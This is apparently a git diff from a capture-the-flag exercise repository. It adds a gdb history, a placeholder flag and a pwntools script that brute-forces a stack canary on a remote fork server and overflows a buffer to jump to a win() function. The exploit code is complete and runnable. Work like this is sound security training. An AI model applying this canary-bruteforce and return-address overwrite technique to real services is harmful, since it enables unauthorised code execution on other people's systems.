Second CTFs part

canary/02_fortune_cookie/.gdb_history

@@ -0,0 +1,48 @@
+disass vuln
+disass main
+b *0x00000000004018ef
+r
+print $rbp
+print $rdx
+r
+r
+run
+quit
+r
+r
+quit
+r
+disass main
+quit
+disass 
+disass handle_client
+quit
+disass handle_data
+disass vuln
+disass main
+r
+quit
+disass read_data
+b *0x00000000004015d3
+r
+quit
+b win
+r
+r
+r
+quit
+set follow-fork-mode child
+disass read_data
+b *0x00000000004015dc
+r
+r
+quit
+set follow-fork-mode child
+disass win
+b win
+r
+r
+exit
+disass win
+b *0x0000000000401530
+r

canary/02_fortune_cookie/flag

@@ -0,0 +1 @@
+prova prova

canary/02_fortune_cookie/solve.py

@@ -0,0 +1,56 @@
+#!/usr/bin/env python3
+import time
+
+from pwn import *
+
+HOST, PORT = "offsec.m0lecon.it", 13569
+# HOST, PORT = '127.0.0.1', 4444
+OFFSET_TO_CANARY = 72
+OFFSET_TO_RIP = OFFSET_TO_CANARY + 8 + 8
+
+elf = ELF("./fortune_cookie", checksec=False)
+
+# bruteforce canary on fork server
+known = b"\x00"
+"""for i in range(7):
+    for bval in range(256):
+        guess = known + bytes([bval])
+        payload = b"A" * OFFSET_TO_CANARY + guess
+
+        io = remote(HOST, PORT, level='error')
+        io.recvuntil(b"wish\n")
+        io.send(payload)
+        try:
+            data = io.recv(timeout=0.2)
+        except EOFError:
+            data = b""
+        io.close()
+
+        if b"OK" in data:
+            known = guess
+            log.success(f"byte {i+1}: {bval:02x}")
+            break
+"""
+# canary = u64(known)
+canary = 0x4F03B0B41EBDDB00
+log.info(f"Canary: {canary:#x}")
+# gadget = 0x4013cf
+gadget = 0x000000000040190D
+gadget4 = 0x0000000000401016
+gadget3 = 0x0000000000401438
+gadget2 = 0x40101A
+io = remote(HOST, PORT)
+io.recvuntil(b"wish\n")
+payload = flat(
+    b"A" * OFFSET_TO_CANARY,
+    p64(canary),
+    # b'B' * 8,
+    b"B" * (OFFSET_TO_RIP - OFFSET_TO_CANARY - 8),
+    p64(gadget2),  # Gadget
+    p64(elf.sym.win),
+)
+io.send(payload)
+# io.recvline()
+io.interactive()
+# io.sendline(b'ls')
+io.recvline()